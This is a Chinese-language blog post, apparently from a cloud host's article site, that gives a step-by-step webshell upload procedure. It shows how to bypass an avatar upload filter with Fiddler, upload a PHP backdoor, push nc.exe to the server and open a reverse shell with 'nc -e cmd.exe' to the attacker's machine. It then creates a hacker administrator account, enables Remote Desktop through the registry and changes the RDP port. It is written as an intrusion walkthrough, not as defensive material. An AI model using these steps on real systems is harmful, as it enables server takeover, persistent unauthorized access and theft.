溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
獲取短信驗證碼
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》
登 錄 注冊有禮
云服務器 香港服務器 高防服務器
最新更新 網站標簽 地圖導航
產品

webshell后門上傳流程

發布時間:2020-08-01 22:28:05 來源:網絡 閱讀:596 作者:securityHu 欄目:建站服務器

1、將webshell.php的后綴名改成jpg等圖片格式,即web.jpg。

2、打開相應網址,注冊好賬號后選擇上傳頭像將web.jpg上傳期間運行fiddler并設置斷點,切換到raw界面,等到其提示相應請求代碼后,將其代碼段中第二個含有上傳圖片名稱的代碼改成web.php,之后繼續響應請求。

3、此時已經成功把后門程序上傳,將服務器反饋的代碼中含有路徑的部分復制粘貼到網站URL后面(注意將?php覆蓋)刷新網頁。

4、然后輸入相應密碼進入控制服務器端,將本機的nc.exe(netcut)上載到其C盤根目錄下。

5、而后在自己本機打開cmd命令窗口找到nc.exe所在的目錄并運行

6、這時已經進入nc.exe,在Cmd line:后輸入nc -vv -l -p 8080進行監聽

7、在控制服務器端選擇Execute Command窗口,輸入'c:\nc.exe -vv [自身ip 端口] -e cmd.exe'啟動nc(綁定服務器端主機的cmd.exe在本機的相應端口)

8、然后就可以添加自己的賬號作為管理員了,具體操作是:

(1) net user hacker 3836546 /add (添加用戶)

(2) net user localgroup administrators test /add (添加到管理員組)

9、寫入注冊表:REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

(win2k,winxp,win2k3下開啟遠程桌面,不用重啟)

10、有時還需要修改3389端口

[HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Terminal Server\Wds\Repwd\Tds\Tcp]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentContro1Set\Control\TenninalServer\WinStations\RDP-Tcp]

11、完成上述流程后,你就可以進入服務器端的主機進行操作


向AI問一下細節
推薦閱讀:
  1. ssh后門
  2. 項目上傳到Appstore流程

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

監聽 bs

猜你喜歡

最新資訊
相關推薦

相關標簽

適用 官方文檔 kubectl管理 選中 次數 php 盲反饋 偽反饋 檢索系統 特定文件 幾種方式 模板創建 java環境 鏈路 原子 掃描器 持久層 出錯 監聽配置 rxjava retrofit web容器 apiview
AI

產品服務
地區劃分
專題活動
幫助支持
關于我們
售后咨詢
7*24小時在線電話:400-100-2938
7*24小時在線 QQ:800811969
關注億速云

億速云公眾號

手機網站二維碼

Copyright ? Yisu Cloud Ltd. All Rights Reserved. 2018 版權所有

廣州億速云計算有限公司粵ICP備17096448號-1 粵公網安備 44010402001142號增值電信業務經營許可證編號:B1-20181529

亚洲午夜精品一区二区_中文无码日韩欧免_久久香蕉精品视频_欧美主播一区二区三区美女